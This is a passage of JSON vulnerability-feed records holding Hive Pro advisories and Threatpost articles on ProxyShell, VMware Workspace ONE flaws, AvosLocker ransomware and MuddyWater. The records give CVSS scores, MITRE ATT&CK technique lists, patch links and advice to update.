"id": "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "href": "https://www.hivepro.com/proxyshell-and-petitpotam-exploits-weaponized-by-lockfile-ransomware-group/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-27T15:34:57", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 430 5 2 Worldwide 17 46 The fourth week of April 2022 witnessed the discovery of 430 vulnerabilities out of which 5 gained the attention of Threat Actors and security researchers worldwide. Among these 5, there was 1 zero-day, and 1 vulnerability that was awaiting analysis on the National Vulnerability Database (NVD). Hive Pro Threat Research Team has curated a list of 5 CVEs that require immediate action. Further, we also observed Two Threat Actor groups being highly active in the last week. Lazarus, a North Korea threat actor group popular for financial crime and gain, was observed targeting blockchain technology and the cryptocurrency industry using a new malware TraderTraitor and Hive ransomware group was seen using the ProxyShell vulnerabilities to target organizations all around the world. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34473 CVE-2021-34523 CVE-2021-31207 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207 CVE-2022-0540 https://www.atlassian.com/software/jira/core/download https://www.atlassian.com/software/jira/update CVE-2022-29072* Not Available Active Actors: Icon Name Origin Motive Lazarus Group (APT38, BlueNoroff, and Stardust Chollima) North Korea Financial crime and gain Hive Ransomware Group Unknown Financial crime and gain Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1588: Obtain Capabilities T1190: Exploit Public-Facing Application T1059: Command and Scripting Interpreter T1136: Create Account T1134: Access Token Manipulation T1134: Access Token Manipulation T1110: Brute Force T1083: File and Directory Discovery T1570: Lateral Tool Transfer T1560: Archive Collected Data T1071: Application Layer Protocol T1567: Exfiltration Over Web Service T1486: Data Encrypted for Impact T1588.005: Exploits T1566: Phishing T1059.007: JavaScript T1136.002: Domain Account T1543: Create or Modify System Process T1140: Deobfuscate/Decode Files or Information T1003: OS Credential Dumping T1135: Network Share Discovery T1021: Remote Services T1560.001: Archive via Utility T1071.001: Web Protocols T1496: Resource Hijacking T1588.006: Vulnerabilities T1566.001: Spearphishing Attachment T1059.001: PowerShell T1053: Scheduled Task/Job T1068: Exploitation for Privilege Escalation T1562: Impair Defenses T1003.005: Cached Domain Credentials T1057: Process Discovery T1021.001: Remote Desktop Protocol T1005: Data from Local System T1105: Ingress Tool Transfer T1566.002: Spearphishing Link T1059.003: Windows Command Shell T1053.005: Scheduled Task T1053: Scheduled Task/Job T1562.001: Disable or Modify Tools T1018: Remote System Discovery T1021.002: SMB/Windows Admin Shares T1113: Screen Capture T1078: Valid Accounts T1106: Native API T1078: Valid Accounts T1053.005: Scheduled Task T1070: Indicator Removal on Host T1518: Software Discovery T1021.006: Windows Remote Management T1078.002: Domain Accounts T1053: Scheduled Task/Job T1078.002: Domain Accounts T1078: Valid Accounts T1553: Subvert Trust Controls T1518.001: Security Software Discovery T1053.005: Scheduled Task T1078.002: Domain Accounts T1078: Valid Accounts T1049: System Network Connections Discovery T1204: User Execution T1078.002: Domain Accounts T1204.002: Malicious File T1047: Windows Management Instrumentation Threat Advisories: Bypass Authentication vulnerability in Atlassian Jira Seraph Hive Ransomware targets organizations with ProxyShell exploit Lazarus is back, targeting organizations with cryptocurrency thefts via TraderTraitor malware What will be the consequence of this disputed vulnerability in 7-ZIP?", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T12:44:38", "type": "hivepro", "title": "Weekly Threat Digest: 18 \u2013 24 April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-0540", "CVE-2022-29072"], "modified": "2022-04-27T12:44:38", "id": "HIVEPRO:09525E3475AC1C5F429611A90182E82F", "href": "https://www.hivepro.com/weekly-threat-digest-18-24-april-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T19:32:38", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Multiple vulnerabilities have been discovered in VMware products. Two of these have been exploited in the wild. The first zero-day vulnerability, CVE-2022-22954, is a server-side template injection flaw. An attacker could exploit this bug to gain network access and remotely execute code in order to deliver cryptominers. Several Proof of Concepts (PoCs) of this issue indicates that it could be weaponized by ransomwares/ threat actor groups soon. The second zero-day vulnerability, CVE-2022-22960 exists due to improper permissions in support scripts. An attacker could exploit this issue to escalate privileges to root on vulnerable servers. Organizations have advised the patch of all these vulnerabilities as soon as possible to avoid exploitation. Potential MITRE ATT&CK TTPs are: TA0042: Resource Development TA0001: Initial Access TA0004: Privilege Escalation T1588: Obtain Capabilities T1588.006: Obtain Capabilities: Vulnerabilities T1190: Exploit Public-Facing Application T1548: Abuse Elevation Control Mechanism T1068: Exploitation for Privilege Escalation Vulnerability Detail Patch Links https://kb.vmware.com/s/article/88099 References https://www.vmware.com/security/advisories/VMSA-2022-0011.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-18T13:06:29", "type": "hivepro", "title": "Two actively exploited vulnerabilities affect multiple VMware products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960"], "modified": "2022-04-18T13:06:29", "id": "HIVEPRO:850B279759C02AA5967698B7B141C8C2", "href": "https://www.hivepro.com/two-actively-exploited-vulnerabilities-affect-multiple-vmware-products/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:24:49", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Federal Bureau of Investigation and Cybersecurity and Infrastructure Security Agency released threat advisories on AvosLocker Ransomware. It is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations in critical infrastructure sectors such as financial services, manufacturing plants, and government facilities in countries such as the United States, Saudi Arabia, the United Kingdom, Germany, Spain, and the United Arab Emirates, among others. After it's affiliates infect targets, AvosLocker claims to handle ransom negotiations, as well as the publishing and hosting of exfiltrated victim data. The AvosLocker ransomware is a multi-threaded C++ Windows executable that operates as a console application and displays a log of actions performed on victim computers. For the delivery of the ransomware payload, the attackers use spam email campaigns as the initial infection vector. The threat actors exploits Proxy Shell vulnerabilities CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473, as well as CVE-2021-26855 to gain access to victim\u2019s machine and then they deploy Mimikatz to steal passwords. Furthermore, threat actors can use the detected credentials to get RDP access to the domain controller and then exfiltrate data from the compromised machine. Finally, the attacker installs AvosLocker ransomware on the victim's computer and then encrypts the victim's documents and files with the ".avos" extension. The actor then leaves a ransom letter in each directory named "GET YOUR FILES BACK.txt" with a link to an AvosLocker .onion payment site. The Organizations can mitigate the risk by following the recommendations: \u2022Keep all operating systems and software up to date. \u2022Remove unnecessary access to administrative shares. \u2022Maintain offline backups of data and Ensure all backup data is encrypted and immutable. The MITRE TTPs commonly used by Avoslocker are: TA0001: Initial AccessTA0002: ExecutionTA0007: DiscoveryTA0040: ImpactT1566: PhishingT1204: User ExecutionT1082: System Information DiscoveryT1490: Inhibit System RecoveryT1489: Service StopT1486: Data Encrypted for Impact Actor Detail Vulnerability Details Indicators of Compromise (IoCs) Patches https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 Recent Breaches https://www.unical.com/ https://www.paccity.net/ https://www.gigabyte.com/ Reference https://www.cisa.gov/uscert/ncas/current-activity/2022/03/22/fbi-and-fincen-release-advisory-avoslocker-ransomware", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-24T06:30:44", "type": "hivepro", "title": "AvosLocker Ransomware group has targeted 50+ Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-24T06:30:44", "id": "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "href": "https://www.hivepro.com/avoslocker-ransomware-group-has-targeted-50-organizations-worldwide/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-24T03:41:41", "description": "Threat Level Vulnerability Report For a detailed advisory, download the pdf file here Summary The Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning to organizations about malicious actors using CVE-2022-22954 and CVE-2022-22960. This alert was published following the disclosure of two related vulnerabilities (CVE-2022-22972 and CVE-2022-22973), putting it vulnerable to future exploitation. All these flaws might be exploited separately or in combination to obtain total control.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T14:34:51", "type": "hivepro", "title": "Vulnerabilities in VMware when chained together grants Full System Control", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-19T14:34:51", "id": "HIVEPRO:4FB5DD5F7C41E3797518D866E88BFA8C", "href": "https://www.hivepro.com/vulnerabilities-in-vmware-when-chained-together-grants-full-system-control/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-18T13:20:19", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/11/MuddyWater-is-taking-advantage-of-old-vulnerabilities_TA202149.pdf>)[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F11%2FA-zero-day-vulnerability-has-been-discovered-in-PANs-GlobalProtect-firewall_TA202148-1.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom's National Cyber Security Centre (NCSC) have issued a joint advisory to warn organizations about an APT State sponsored Actor exploiting old Fortinet and proxyshell vulnerabilities. \nSince late March 2021, this APT Iranian State sponsored Actor (MuddyWater) has been breaching vulnerable networks by exploiting Fortinet vulnerabilities. The Hive Pro threat Research team has issued a detailed and in [depth](<https://www.hivepro.com/old-fortinet-vulnerabilities-exploited-by-state-sponsored-actors/>) advisory for the same. \nNow, in October 2021, MuddyWater is getting initial access to the susceptible system by exploiting the well known ProxyShell Vulnerability (CVE 2021 34473). \nIt is recommended that organizations patch these vulnerabilities as soon as available. \nThe Tactics and Techniques used by MuddyWater are: \nTA0042 - Resource Development \nT1588.001 - Obtain Capabilities: Malware \nT1588.002 - Obtain Capabilities: Tool \nTA0001 - Initial Access \nT1190 - Exploit Public Facing Application \nTA0002 - Execution \nT1053.005 - Scheduled Task/Job: Scheduled Task \nTA0003 - Persistence \nT1136.001 - Create Account: Local Account \nT1136.002 - Create Account: Domain Account \nTA0004 - Privilege Escalation \nTA0006 - Credential Access \nTA0009 - Collection \nT1560.001 - Archive Collected Data: Archive via Utility \nTA0010 - Exfiltration \nTA0040 - Impact \nT1486 - Data Encrypted for Impact\n\n#### Actor Details\n\n\n\n#### Vulnerability Details\n\n\n\n#### Indicators of Compromise (IoCs)\n\n\n\n#### Patch Link\n\n<https://kb.fortinet.com/kb/documentLink.do?externalID=FD37033>\n\n<http://www.securityfocus.com/bid/108693>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n#### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa21-321a>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-18T11:45:32", "type": "hivepro", "title": "MuddyWater is taking advantage of old vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-11-18T11:45:32", "id": "HIVEPRO:186D6EE394314F861D57F4243E31E975", "href": "https://www.hivepro.com/muddywater-is-taking-advantage-of-old-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-08-26T23:21:31", "description": "Microsoft has broken its silence on the [recent barrage of attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) on several ProxyShell vulnerabilities in that were [highlighted](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) by a researcher at Black Hat earlier this month.\n\nThe company [released an advisory](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) late Wednesday letting customers know that threat actors may use unpatched Exchange servers \u201cto deploy ransomware or conduct other post-exploitation activities\u201d and urging them to update immediately.\n\n\u201cOur recommendation, as always, is to install the latest CU and SU on all your Exchange servers to ensure that you are protected against the latest threats,\u201d the company said. \u201cPlease update now!\u201d \n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)Customers that have installed the [May 2021 security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>) or the [July 2021 security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-july-2021-exchange-server-security-updates/ba-p/2523421>) on their Exchange servers are protected from these vulnerabilities, as are Exchange Online customers so long as they ensure that all hybrid Exchange servers are updated, the company wrote.\n\n\u201cBut if you have not installed either of these security updates, then your servers and data are vulnerable,\u201d according to the advisory.\n\nThe ProxyShell bugs that Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) outlined in a presentation at Black Hat. The three vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) enable an adversary to trigger remote code execution on Microsoft Exchange servers. Microsoft said the bugs can be exploited in the following cases:\n\n\u2013The server is running an older, unsupported CU;\n\n\u2013The server is running security updates for older, unsupported versions of Exchange that were [released](<https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020>) in March 2021; or\n\n\u2013The server is running an older, unsupported CU, with the [March 2021 EOMT](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) mitigations applied.\n\n\u201cIn all of the above scenarios, you _must_ install one of latest supported CUs and all applicable SUs to be protected,\u201d according to Microsoft. \u201cAny Exchange servers that are not on a supported CU _and_ the latest available SU are vulnerable to ProxyShell and other attacks that leverage older vulnerabilities.\u201d\n\n**Sounding the Alarm**\n\nFollowing Tsai\u2019s presentation on the bugs, the SANS Internet Storm Center\u2019s Jan Kopriva [reported](<https://isc.sans.edu/forums/diary/ProxyShell+how+many+Exchange+servers+are+affected+and+where+are+they/27732/>) that [he found more](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) than 30,000 vulnerable Exchange servers via a Shodan scan and that any threat actor worthy of that title would find exploiting then easy to execute, given how much information is available.\n\nSecurity researchers at Huntress also reported seeing [ProxyShell vulnerabilities](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) being actively exploited throughout the month of August to install backdoor access once the [ProxyShell exploit code](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>) was published on Aug. 6. But starting last Friday, Huntress reported a \u201csurge\u201d in attacks after finding 140 webshells launched against 1,900 unpatched Exchange servers.\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) joined those sounding the alarm over the weekend, issuing [an urgent alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>). They, too, urged organizations to immediately install the latest Microsoft Security Update.\n\nAt the time, researcher Kevin Beaumont expressed [criticism over Microsoft\u2019s messaging efforts](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>) surrounding the vulnerability and the urgent need for its customers to update their Exchange Server security.\n\n\u201cMicrosoft decided to downplay the importance of the patches and treat them as a standard monthly Exchange patch, which [has] been going on for \u2013 obviously \u2013 decades,\u201d Beaumont explained.\n\nBut Beaumont said these remote code execution (RCE) vulnerabilities are \u201c\u2026as serious as they come.\u201d He noted that the company did not help matters by failing to allocate CVEs for them until July \u2014 four months after the patches were issued.\n\nIn order of patching priority, according to Beaumont, the vulnerabilities are: [CVE-2021\u201334473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021\u201334523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) and [CVE-2021\u201331207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>).\n\nCVE-2021-34473, a vulnerability in which a pre-auth path confusion leads to ACL Bypass, was patched in April. CVE-2021-34523, also patched in April, is an elevation of privilege on Exchange PowerShell backend. CVE-2021-31207, a bug in which a post-auth Arbitrary-File-Write leads to remote code execution, was patched in May.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-26T12:39:54", "type": "threatpost", "title": "Microsoft Breaks Silence on Barrage of ProxyShell Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-26T12:39:54", "id": "THREATPOST:83C349A256695022C2417F465CEB3BB2", "href": "https://threatpost.com/microsoft-barrage-proxyshell-attacks/168943/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T13:56:05", "description": "Recently reported VMware bugs are being used by hackers who are focused on using them to deliver Mirai denial-of-service malware and exploit the [Log4Shell](<https://threatpost.com/log4shell-cve-2021-44228/178225/>) vulnerability.\n\n[Security researchers at Barracuda](<https://blog.barracuda.com/2022/05/17/threat-spotlight-attempts-to-exploit-new-vmware-vulnerabilities/>) discovered that attempts were made to exploit the recent vulnerabilities [CVE-2022-22954](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22954>) and [CVE-2022-22960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22960#:~:text=VMware%20Workspace%20ONE%20Access%2C%20Identity,escalate%20privileges%20to%20'root'.>), both reported last month.\n\n\u201cBarracuda researchers analyzed the attacks and payloads detected by Barracuda systems between April to May and found a steady stream of attempts to exploit two recently uncovered VMware vulnerabilities: CVE-2022-22954 and CVE-2022-22960\u201d reported by Barracuda.\n\nVMware published an [advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>) on April 6, 2022, which detailed multiple security vulnerabilities. The most severe of these is CVE-2022-22954 with a CVSS score of 9.8, the bug allows an attacker with network access to perform remote code execution via server-side template injection on VMware Workspace ONE Access and Identity Manager Solutions.\n\nThe other bug involved CVE-2022-22960 (CVSS score 7.8), is a local privilege escalation vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. According to the advisory by VMware, the bug arises due to improper permission in support scripts allowing an attacker with local access to gain root privileges.\n\nThe VMware Workspace One is an intelligent-drive workspace platform that helps to manage any app on any device in a secure and simpler manner. The Identity manager handles the authentication to the platform and vRealize Automation is a DevOps-based infrastructure management platform for config of IT resources and automating the delivery of container-based applications.\n\n## **Exploitation Occurred After PoC Release**\n\nThe Barracuda researchers noted that the previous flaws are chained together for a potential full exploitation vector.\n\nAfter the bug was disclosed by VMware in April, a [proof-of-concept (PoC)](<https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433>) was released on Github and shared via Twitter.\n\n\u201cBarracuda researchers started seeing probes and exploit attempts for this vulnerability soon after the release of the advisory and the initial release of the proof of concept on GitHub,\u201d reported Barracuda.\n\nAfter the release of PoC, the spike in attempts is noticed by the researcher, they classified it as a probe rather than actual attempts to exploit.\n\n\u201cThe attacks have been consistent over time, barring a few spikes, and the vast majority of them are what would be classified as probes rather than actual exploit attempts,\u201d they added.\n\nThe researchers at Barracuda also revealed that most of the exploit attempts are primarily from botnet operators, the IPs discovered still seem to host variants of the [Mirai ](<https://threatpost.com/gafgyt-botnet-ddos-mirai/165424/>)distributed-denial-of-service (DDoS) botnet malware, along with some Log4Shell exploits and low levels of EnemyBot (a type of DDoS botnet) attempts.\n\nThe majority of the attacks (76 percent) originated from the U.S. geographically, with most of them coming from data centers and cloud providers. The researcher added that there is a spike in IP addresses from the UK and Russia and about (6 percent) of the attacks emanate from these locations.\n\nThe researchers noted, \u201cthere are also consistent background attempts from known bad IPs in Russia.\u201d\n\n\u201cSome of these IPs perform scans for specific vulnerabilities at regular intervals, and it looks like the VMware vulnerabilities have been added to their usual rotating list of Laravel/Drupal/PHP probes,\u201d researchers explained\n\nAccording to Barracuda \u201cthe interest levels on these vulnerabilities have stabilized\u201d after the initial spike in April, the researcher expected to analyze low-level scanning and attempts for some time.\n\nThe best way to protect the systems is to apply the patches immediately, especially if the system is internet-facing, and to place a Web application firewall (WAF) in front of such systems \u201cwill add to defense in depth against zero-day attacks and other vulnerabilities, including Log4Shell,\u201d advised by Barracuda.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-18T13:54:23", "type": "threatpost", "title": "April VMware Bugs Abused to Deliver Mirai Malware, Exploit Log4Shell", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22954", "CVE-2022-22960"], "modified": "2022-05-18T13:54:23", "id": "THREATPOST:590E1D474E265F02BA634F492F728536", "href": "https://threatpost.com/vmware-bugs-abused-mirai-log4shell/179652/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-18T02:26:11", "description": "A state-backed Iranian threat actor has been using multiple CVEs \u2013 including both serious Fortinet vulnerabilities for months and a Microsoft Exchange ProxyShell weakness for weeks \u2013 looking to gain a foothold within networks before moving laterally and launching [BitLocker](<https://threatpost.com/hades-ransomware-connections-hafnium/165069/>) ransomware and other nastiness.\n\nA joint [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) published by CISA on Wednesday was meant to highlight the ongoing, malicious cyber assault, which has been tracked by the FBI, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC) and the United Kingdom\u2019s National Cyber Security Centre (NCSC). All of the security bodies have traced the attacks to an Iranian government-sponsored advanced persistent threat (APT).\n\nThe Iranian APT has been exploiting Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021, according to the alert. The weaknesses are granting the attackers initial access to systems that\u2019s 